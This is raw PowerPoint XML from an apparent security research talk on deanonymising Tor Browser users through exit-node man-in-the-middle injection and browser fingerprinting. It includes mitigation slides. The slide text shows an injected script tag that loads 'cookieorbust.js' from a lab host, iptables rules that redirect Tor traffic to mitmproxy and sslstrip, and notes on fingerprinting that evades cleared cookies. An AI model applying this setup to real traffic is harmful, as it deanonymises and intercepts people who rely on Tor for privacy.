            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mitm_uuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
              <a:t>="%s";&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
              <a:t>=“http://10.0.0.4/cookieorbust.js"&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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107504" y="1412776"/>
            <a:ext cx="8856984" cy="4801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#clear </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>iptables</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1700" b="1" dirty="0" smtClean="0"/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-F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-X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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>nat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1700" dirty="0" smtClean="0"/>
              <a:t> -F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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>nat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1700" dirty="0" smtClean="0"/>
              <a:t> -X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mangle -F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mangle -X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-P INPUT ACCEPT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-P FORWARD ACCEPT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-P OUTPUT ACCEPT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" smtClean="0"/>
              <a:t>#set up redirects for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mitmproxy</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1700" b="1" dirty="0" smtClean="0"/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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>nat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1700" dirty="0" smtClean="0"/>
              <a:t> -A OUTPUT -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1700" dirty="0" smtClean="0"/>
              <a:t> -m owner --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1700" dirty="0" smtClean="0"/>
              <a:t>-owner tor --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>dport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1700" dirty="0" smtClean="0"/>
              <a:t> 80 -j REDIRECT --to-port 6060</a:t>
            </a:r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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>nat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1700" dirty="0" smtClean="0"/>
              <a:t> -A OUTPUT -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1700" dirty="0" smtClean="0"/>
              <a:t> -m owner --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1700" dirty="0" smtClean="0"/>
              <a:t>-owner tor --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>dport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1700" dirty="0" smtClean="0"/>
              <a:t> 443 -j REDIRECT --to-port 6060</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" smtClean="0"/>
              <a:t>#set up redirects for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>sslstrip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>iptables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1700" dirty="0" smtClean="0"/>
              <a:t> -t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>nat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1700" dirty="0" smtClean="0"/>
              <a:t> -A OUTPUT -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1700" dirty="0" smtClean="0"/>
              <a:t> -m owner --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1700" dirty="0" smtClean="0"/>
              <a:t>-owner </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>mitm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1700" dirty="0" smtClean="0"/>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>dport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1700" dirty="0" smtClean="0"/>
              <a:t> 80 -j REDIRECT --to-port 6666</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA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5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00"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="314" presetID="24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6" grpId="0" animBg="1"/>
      <p:bldP spid="16" grpId="1" animBg="1"/>
      <p:bldP spid="16" grpId="2" animBg="1"/>
      <p:bldP spid="22" grpId="0"/>
      <p:bldP spid="22" grpId="1"/>
      <p:bldP spid="22" grpId="2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/>
      <p:bldP spid="33" grpId="1"/>
      <p:bldP spid="33" grpId="2"/>
      <p:bldP spid="9" grpId="2" animBg="1"/>
      <p:bldP spid="25" grpId="0" animBg="1"/>
      <p:bldP spid="25" grpId="1" animBg="1"/>
      <p:bldP spid="25" grpId="2" animBg="1"/>
      <p:bldP spid="26" grpId="0"/>
      <p:bldP spid="26" grpId="1"/>
      <p:bldP spid="26" grpId="2"/>
      <p:bldP spid="28" grpId="0" animBg="1"/>
      <p:bldP spid="28" grpId="1" animBg="1"/>
      <p:bldP spid="28" grpId="2" animBg="1"/>
      <p:bldP spid="29" grpId="0"/>
      <p:bldP spid="29" grpId="1"/>
      <p:bldP spid="29" grpId="2"/>
      <p:bldP spid="77" grpId="0"/>
      <p:bldP spid="78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 animBg="1"/>
      <p:bldP spid="95" grpId="0" animBg="1"/>
      <p:bldP spid="96" grpId="0"/>
      <p:bldP spid="97" grpId="0"/>
      <p:bldP spid="98" grpId="0" animBg="1"/>
      <p:bldP spid="99" grpId="0"/>
      <p:bldP spid="100" grpId="0" animBg="1"/>
      <p:bldP spid="101" grpId="0" animBg="1"/>
      <p:bldP spid="102" grpId="0" animBg="1"/>
      <p:bldP spid="103" grpId="0"/>
      <p:bldP spid="104" grpId="0"/>
      <p:bldP spid="105" grpId="0"/>
      <p:bldP spid="120" grpId="0" animBg="1"/>
      <p:bldP spid="120" grpId="1" animBg="1"/>
      <p:bldP spid="121" grpId="0" animBg="1"/>
      <p:bldP spid="1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Platform Demo</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="4800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="proxy5_edited0001-241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401812"/>
            <a:ext cx="9144000" cy="5143499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2" dur="79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18" dur="70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6)">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="6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2)">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="58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2)">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="48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2)">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="18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67)">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="13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0)">
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="10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Fingerprinting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50048"/>
            <a:ext cx="9144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0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Identify browser or machine based on unique set of attributes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcAft>
                <a:spcPts val="2000"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Attributes extracted from user agent, screen resolution, language settings, CPU architecture, OS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>plugins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>/extensions, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcAft>
                <a:spcPts val="2000"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Acts as a cookie between sessions, bypasses clearing cookies, disabled cookies, private browsing mode, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcAft>
                <a:spcPts val="2000"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Can be used to correlate traffic coming over exit nodes to a single user.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oud">
      <a:dk1>
        <a:srgbClr val="295892"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="F5F7FA"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="89A3C3"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="D8E1EB"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="285891"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="6587B0"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="88A2C2"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="B4C5D9"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="D7E0EA"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="F3F5F8"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="295892"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="2958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2616</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>527</Paragraphs>
  <Slides>29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Tor Browser Bundle</vt:lpstr>
      <vt:lpstr>Attack Model</vt:lpstr>
      <vt:lpstr>Attack Model</vt:lpstr>
      <vt:lpstr>Tor Testbed</vt:lpstr>
      <vt:lpstr>Tor Testbed</vt:lpstr>
      <vt:lpstr>Attack Platform</vt:lpstr>
      <vt:lpstr>Platform Demo</vt:lpstr>
      <vt:lpstr>Fingerprinting</vt:lpstr>
      <vt:lpstr>fingerprintjs</vt:lpstr>
      <vt:lpstr>resource:///defaults/preferences/</vt:lpstr>
      <vt:lpstr>resource:///defaults/preferences/</vt:lpstr>
      <vt:lpstr>Platform Comparison</vt:lpstr>
      <vt:lpstr>New Fingerprint Surface</vt:lpstr>
      <vt:lpstr>New Fingerprint Surface</vt:lpstr>
      <vt:lpstr>New Fingerprint Surface</vt:lpstr>
      <vt:lpstr>New Fingerprint Surface</vt:lpstr>
      <vt:lpstr>Proof of Concept Demo</vt:lpstr>
      <vt:lpstr>Proof of Concept Demo</vt:lpstr>
      <vt:lpstr>Issues</vt:lpstr>
      <vt:lpstr>Platform Comparison</vt:lpstr>
      <vt:lpstr>BrowserFeedWriter</vt:lpstr>
      <vt:lpstr>Fingerprinting Demo</vt:lpstr>
      <vt:lpstr>Identification</vt:lpstr>
      <vt:lpstr>Exploit Status</vt:lpstr>
      <vt:lpstr>Mitigation</vt:lpstr>
      <vt:lpstr>Mitigation</vt:lpstr>
      <vt:lpstr>Conclusions &amp; Future Work</vt:lpstr>
      <vt:lpstr>Slide 29</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>RIM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Dan</cp:lastModifiedBy>
  <cp:revision>289</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-03-03T22:54:45Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-04-07T07:08:50Z</dcterms:modified>
</cp:coreProperties>
</file>